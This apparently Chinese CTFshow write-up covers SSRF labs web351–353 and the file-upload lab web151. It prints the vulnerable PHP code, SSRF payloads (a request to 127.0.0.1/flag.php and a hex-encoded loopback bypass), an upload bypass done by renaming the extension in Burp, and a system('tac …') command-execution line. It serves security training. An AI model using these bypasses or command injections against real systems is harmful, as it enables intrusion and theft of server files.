当前位置: 首页 > article >正文

CTFshow-SSRF文件上传

web351

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?>

构造POST

url=http://127.0.0.1/flag.php

web352

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127.0.0/')){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?>

代码分析

error_reporting(0); 这一行关闭了所有PHP错误报告,这在生产环境中可能是为了保持用户体验的干净,但在开发过程中关闭错误报告不是一个好习惯,因为它会使调试更加困难。
highlight_file(__FILE__); 这行代码的作用是显示当前文件的源代码。当这个PHP脚本被执行时,它会高亮显示自身的代码。这通常用于学习或展示代码的目的,但它也可能无意中暴露了源代码,带来安全隐患。
$url = $_POST['url']; 这行代码从POST请求中获取名为url的参数值,将其赋值给变量$url。
$x = parse_url($url); 使用parse_url()函数解析$url,并返回一个关联数组,其中包含了URL的不同部分(如方案、主机名等)。
if($x['scheme'] === 'http' || $x['scheme'] === 'https') { ... } else { die('hacker'); } 这段条件语句检查解析后的URL是否使用的是HTTP或HTTPS协议。如果不是这两种协议之一,则程序终止执行,并输出'hacker',这可能是为了阻止尝试利用其他协议进行的攻击。
在检查协议之后,代码进一步检查URL中是否包含localhost或127.0.0(通常代表本地回环地址)。这是通过preg_match()函数完成的。如果匹配成功(即URL试图访问本地资源),则程序也会终止执行并输出'hacker'。
如果上述两个检查都通过了,代码将继续执行。它使用cURL库来发送HTTP请求到提供的URL,并通过设置选项CURLOPT_RETURNTRANSFER为1来确保响应体被作为字符串返回而不是直接输出。然后,通过curl_exec()执行请求,并将结果存储在变量$result中。
最后,echo ($result); 输出从远程服务器接收到的内容。

同上

web353

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127\.0\.|\。/i', $url)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?> 

用16进制绕过

POST

url=http://0x7f.0.0.1/flag.php

web151

只能上传png格式的图片

bp改个后缀名

命令执行

1=system("tac /var/www/html/flag.php");

1=system("tac /var/www/html/flag.php");


http://www.kler.cn/a/454422.html

相关文章:

  • 数据结构(Java)——链表
  • Redis——数据过期策略
  • 指针与数组:深入C语言的内存操作艺术
  • 【Python】 -- python3 读取 aws athena 表数据
  • VIVO Java开发面试题及参考答案
  • 如何给负载均衡平台做好安全防御
  • PDF书籍《手写调用链监控APM系统-Java版》第6章 链路的架构(Trace+TraceSegment+Span)
  • SQL进阶技巧:如何分析工厂制程顺序问题?
  • GXUOJ-算法-第一次作业
  • Mysql数据究竟是如何存储的
  • flink cdc各种数据库 jar下载地址
  • 【Java 学习】详细讲解---包和导包、Scanner类、输入源
  • 32. 线程、进程与协程
  • javaweb 04 springmvc
  • 【从零开始入门unity游戏开发之——C#篇30】C#常用泛型数据结构类——list<T>列表、`List<T>` 和数组 (`T[]`) 的选择
  • BFD综合详细实验配置案例
  • GitLab 服务变更提醒:中国大陆、澳门和香港用户停止提供服务(GitLab 服务停止)
  • vue3使用video-player实现视频播放(可拖动视频窗口、调整大小)
  • HTTP、HTTPS和SOCKS5代理協議
  • WSL2上Ubuntu22.04安装Docker
  • Windows 使用 非安装版MySQL 8
  • Linux网络——TCP的运用
  • QT集成intel RealSense 双目摄像头
  • NLP 中文拼写检测开源-01-基于贝叶斯公式的拼写检查器 CSC
  • Leetcode 394-字符串解码
  • MinIO服务器文件复制(Windows环境Linux环境)